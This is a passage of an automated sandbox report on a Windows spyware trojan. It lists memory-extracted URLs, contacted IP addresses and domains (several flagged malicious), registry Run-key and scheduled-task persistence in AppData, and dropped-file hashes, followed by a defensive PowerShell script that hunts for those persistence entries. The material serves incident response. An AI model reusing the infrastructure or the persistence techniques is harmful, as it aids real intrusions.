https://api.ip.sb/ip | FA5C.exe, 00000015.00000002.833273258.0000000003971000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.933081162.0000000000402000.00000040.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | FA5C.exe, 00000027.00000002.1021158613.00000000030DF000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1 | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://tempuri.org/Entity/Id24Response | FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested | FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/08/addressing | FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmp | false | | high
https://support.google.com/chrome/?p=plugin_shockwave | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://tempuri.org/Entity/Id5Response | FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD | FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns | FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmp | false | | high
http://tempuri.org/Entity/Id10Response | FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://tempuri.org/Entity/Id8Response | FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://support.google.com/chrome/?p=plugin_wmp | FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity | FA5C.exe, 00000027.00000002.953499141.0000000002EF0000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
https://support.google.com/chrome/?p=plugin_java | FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/06/addressingex | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse | FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmp | false | | high
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510 | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
https://support.google.com/chrome/?p=plugin_divx | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://tempuri.org/Entity/Id13Response | FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1 | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1 | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty | FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement | FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | FA5C.exe, 00000027.00000002.1016026617.00000000030C9000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.976385152.0000000003007000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.1075583600.000000000321E000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.1021158613.00000000030DF000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous | FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2002/12/policy | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://tempuri.org/Entity/Id22Response | FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search | FA5C.exe, 00000027.00000002.1016026617.00000000030C9000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.976385152.0000000003007000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.1075583600.000000000321E000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.1021158613.00000000030DF000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
https://www.tiktok.com/legal/report/feedback | svchost.exe, 00000016.00000003.793370380.000001A784B89000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.793597944.000001A785002000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.793450984.000001A784BD2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/Issue | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
https://get.adob | FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/spnego | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/sc | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://tempuri.org/Entity/Id18Response | FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://service.real.com/realplayer/security/02062012_player/en/ | FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false |
                                                                                                                                                                                high
                                                                                                                                                                                http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsdFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://disneyplus.com/legal.svchost.exe, 00000016.00000003.792006375.000001A784B93000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  http://tempuri.org/Entity/Id3ResponseFA5C.exe, 00000027.00000002.1030809011.0000000003112000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/rmFA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceFA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://schemas.xmlsoap.org/soap/actor/nextFA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=FA5C.exe, 00000027.00000002.1016026617.00000000030C9000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.976385152.0000000003007000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.1075583600.000000000321E000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.1021158613.00000000030DF000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://service.rFA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://tempuri.org/Entity/Id9FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                            unknown
                                                                                                                                                                                            http://tempuri.org/Entity/Id8FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                            unknown

Contacted IPs

(Map legend: share of contacted IPs per country: < 25%, 25% to 50%, 50% to 75%, > 75%)

Public

IP | Domain | Country | ASN | ASN name | Malicious
185.163.45.70 | unknown | Moldova Republic of | 39798 | MIVOCLOUDMD | false
94.142.143.116 | patmushta.info | Russian Federation | 35196 | IHOR-ASRU | false
185.215.113.35 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
188.166.28.199 | unknown | Netherlands | 14061 | DIGITALOCEAN-ASNUS | true
172.67.139.105 | goo.su | United States | 13335 | CLOUDFLARENETUS | false
86.107.197.138 | unknown | Romania | 39855 | MOD-EUNL | false
8.209.70.0 | host-data-coin-11.com | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false
54.38.220.85 | unicupload.top | France | 16276 | OVHFR | false
162.159.135.233 | cdn.discordapp.com | United States | 13335 | CLOUDFLARENETUS | false
104.47.54.36 | microsoft-com.mail.protection.outlook.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
144.76.136.153 | transfer.sh | Germany | 24940 | HETZNER-ASDE | false
81.163.30.181 | unknown | Russian Federation | 58303 | IR-RASANAPISHTAZIR | true
185.233.81.115 | unknown | Russian Federation | 50113 | SUPERSERVERSDATACENTERRU | true
185.7.214.171 | unknown | France | 42652 | DELUNETDE | true
185.186.142.166 | unknown | Russian Federation | 204490 | ASKONTELRU | true
185.163.204.22 | unknown | Germany | 20771 | CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE | false
185.163.204.24 | unknown | Germany | 20771 | CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE | true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 553170
Start date: 14.01.2022
Start time: 12:27:37
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 16m 35s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: sbxGIUIhRd.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 50
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@60/26@82/18
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 25.7% (good quality ratio 18.6%)
• Quality average: 57.3%
• Quality standard deviation: 40.8%
HCA Information:
• Successful, ratio: 57%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• TCP Packets have been reduced to 100
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 40.91.112.76, 20.54.110.249, 20.42.73.29, 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179
• Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, s-ring.msedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, iplogger.org, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, t-ring.msedge.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, a0621298.xsph.ru, watson.telemetry.microsoft.com, microsoft.com, teams-ring.msedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing behavior and disassembly information.

Whitelisted IPs and domains are dropped from the report's network tables, so the contacted-IP and URL lists above are not a complete picture of the sample's traffic. Two of the excluded domains, iplogger.org and a0621298.xsph.ru, are not Microsoft telemetry hosts and are worth checking in the raw PCAP before building an indicator set from this report.
                                                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                            Simulations

                                                                                                                                                                                            Behavior and APIs

Time      Type             Description
12:29:12  Task Scheduler   Run new task: Firefox Default Browser Agent ADA74C3DB01BEC27 path: C:\Users\user\AppData\Roaming\adijaeg
12:29:26  API Interceptor  1x Sleep call for process: CFE8.exe modified
12:29:33  API Interceptor  8x Sleep call for process: svchost.exe modified
12:29:36  API Interceptor  1x Sleep call for process: WerFault.exe modified
12:30:12  API Interceptor  514x Sleep call for process: mjlooy.exe modified
12:30:12  API Interceptor  3x Sleep call for process: 7D38.exe modified
12:30:14  Task Scheduler   Run new task: mjlooy.exe path: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe
12:30:31  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\setup_m.exe
12:30:43  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\setup_m.exe
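The persistence entries in the table above (a HKCU Run value named "Driver" pointing into %APPDATA%\Sysfiles, and two scheduled tasks that launch binaries from the Roaming and Temp folders) are the artifacts a responder would look for on other hosts. The PowerShell triage script below is an added example; it is not part of the Joe Sandbox report and not code from the sample. It generalizes the report's three paths into a rule (flag any Run value or scheduled-task action whose image lives under a user's AppData tree) and also matches the literal paths. The $ReportIndicators list is copied from the table; the registry key list, the path patterns, the function name Test-SuspiciousPath and the output shape are this example's own assumptions. One caveat the table raises: the task name "Firefox Default Browser Agent <hex>" is also the name Mozilla's legitimate agent task uses, so the check keys on the action path (the legitimate agent runs from Program Files), not on the task name.

```powershell
# Added triage example (not from the Joe Sandbox report or the sample).
# Enumerates the two persistence channels the "Behavior and APIs" table shows,
# HKCU/HKLM Run values and Task Scheduler actions, and flags any entry whose
# target lives under a user profile's AppData tree or matches a report path.

# Literal paths copied from the report's Behavior and APIs table.
$ReportIndicators = @(
    'C:\Users\user\AppData\Roaming\Sysfiles\setup_m.exe',
    'C:\Users\user\AppData\Roaming\adijaeg',
    'C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe'
)

# Assumed rule for this example: persistence from %TEMP% or Roaming is rare for
# legitimate software, so any image under a user's AppData is worth review.
$SuspiciousRoots = @(
    [regex]::Escape("$env:USERPROFILE\AppData\Roaming"),
    [regex]::Escape("$env:USERPROFILE\AppData\Local\Temp"),
    'C:\\Users\\[^\\]+\\AppData\\'
)
$SuspiciousPattern = ($SuspiciousRoots -join '|')

function Test-SuspiciousPath {
    param([string]$Path)
    if ([string]::IsNullOrWhiteSpace($Path)) { return $false }
    $expanded = [Environment]::ExpandEnvironmentVariables($Path)
    return [bool]($expanded -match $SuspiciousPattern)
}

$providerProps = @('PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider')
$findings = @()

# 1. Run keys. The report shows value "Driver" under HKCU\...\Run (seen via both
#    the 32-bit and 64-bit registry views) pointing into AppData\Roaming.
$runKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
)
foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $props = Get-ItemProperty -Path $key
    foreach ($p in $props.PSObject.Properties) {
        if ($providerProps -contains $p.Name) { continue }   # registry provider metadata
        $value = [string]$p.Value
        # Reduce "C:\path\to\x.exe" /args or C:\path\to\x.exe /args to the image path.
        $image = ($value -replace '^"([^"]+)".*$', '$1') -replace '^(\S+\.exe).*$', '$1'
        if ((Test-SuspiciousPath $image) -or ($ReportIndicators -contains $image)) {
            $findings += [pscustomobject]@{ Source = "RunKey:$key"; Name = $p.Name; Target = $value }
        }
    }
}

# 2. Scheduled tasks. The report shows "Firefox Default Browser Agent <hex>"
#    (same name pattern as Mozilla's real task) and "mjlooy.exe", both running
#    from the user profile; the path, not the name, is what separates them.
foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
    foreach ($action in $task.Actions) {
        $exe = $action.Execute            # $null for non-exec (COM handler) actions
        if (-not $exe) { continue }
        $taskArgs = $action.Arguments
        if ((Test-SuspiciousPath $exe) -or ($ReportIndicators -contains $exe)) {
            $findings += [pscustomobject]@{
                Source = "Task:$($task.TaskPath)$($task.TaskName)"
                Name   = $task.TaskName
                Target = ("$exe $taskArgs").Trim()
            }
        }
    }
}

$findings | Sort-Object Source | Format-Table -AutoSize
```

Run it in the context of the affected user (HKCU is per user) and, for the HKLM keys and other users' tasks, from an elevated prompt. The report's "HKCU64" row is the sandbox's label for the 64-bit view of the same HKCU key, which is why the script does not query a separate key for it.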

                                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                                            IPs

                                                                                                                                                                                            No context

                                                                                                                                                                                            Domains

                                                                                                                                                                                            No context

                                                                                                                                                                                            ASN

                                                                                                                                                                                            No context

                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                            No context

                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                            No context

                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_8A6B.exe_27f61c19393a91a6721bfcdfd39195a1563f_168ad717_1a666159\Report.wer
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                            Entropy (8bit):0.814130699743922
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:/NFAsohLcQfYOQoJ7R3V6tpXIQcQec6tycEfcw32+HbHg/8BRTf3o8Fa9iVfOyW9:1Ro9cQn8HQ0lLjIq/u7ssS274ItLV
                                                                                                                                                                                            MD5:BCFAA4F0ABE224C129081104195B208D
                                                                                                                                                                                            SHA1:7C74E7C498C804E32708117FED56F786144135DB
                                                                                                                                                                                            SHA-256:571F668A0B47ABB3006EFA67DECA6BDEF2C7B1FEE84F1A834D4E96686EEF2719
                                                                                                                                                                                            SHA-512:66803D4E9AC9824321022784AF827F1A91E057B2F43D903278798D5C50147FE4B4FB3F61A106B8853A0F60517142F1130A8B31A45FD2AD314DEE230A8F494C68
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.6.3.3.3.6.5.5.7.1.0.5.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.6.6.3.3.3.7.4.9.1.4.8.1.8.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.d.5.3.8.4.4.d.-.6.e.2.3.-.4.8.6.4.-.b.c.9.9.-.8.6.8.6.e.4.7.9.c.c.6.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.f.9.d.5.9.b.3.-.7.a.3.d.-.4.7.a.0.-.8.9.8.a.-.4.a.1.4.a.b.4.9.1.5.b.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.8.A.6.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.6.8.-.0.0.0.1.-.0.0.1.b.-.3.0.7.d.-.6.a.f.6.3.9.0.9.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.d.3.e.8.5.d.f.1.f.9.7.0.7.5.8.a.1.f.b.6.1.3.8.8.5.7.3.8.d.c.a.0.0.0.0.2.9.0.1.!.0.0.0.0.5.9.9.5.a.e.9.d.0.2.4.7.0.3.6.c.c.6.d.3.e.a.7.4.1.e.7.5.0.4.c.9.1.3.f.1.f.b.7.6.!.8.A.6.B...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.1././.1.2.:.
                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER9E61.tmp.csv
                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):50272
                                                                                                                                                                                            Entropy (8bit):3.0513863283023377
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:tTH80y1WUTcM/x/5pPrvVsEv1dGNOJOe72bAMS5p:tTH80y1WUTcM/x/5pPrvVsEv1dGNOJR3
                                                                                                                                                                                            MD5:2C514D97A71C40AE306F14DC5FE4939D
                                                                                                                                                                                            SHA1:D54DC9D0B97A9D80856B0B1A2B2B3958F6E93A07
                                                                                                                                                                                            SHA-256:5EB64B0168ACE1914E6D15E9A486DC733228B3FF67C0A91BD29A64B5F7559E57
                                                                                                                                                                                            SHA-512:AACBE3B2EF9E6119597E4FEC4DA7D690E6A66704D7E37B32F8E05D56537BAE0A6A0FA0D9C3775549F1BBEA82DD8843EC0C9E1FB4D3FD9E31D769EEC6C2F8A384
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:unknown
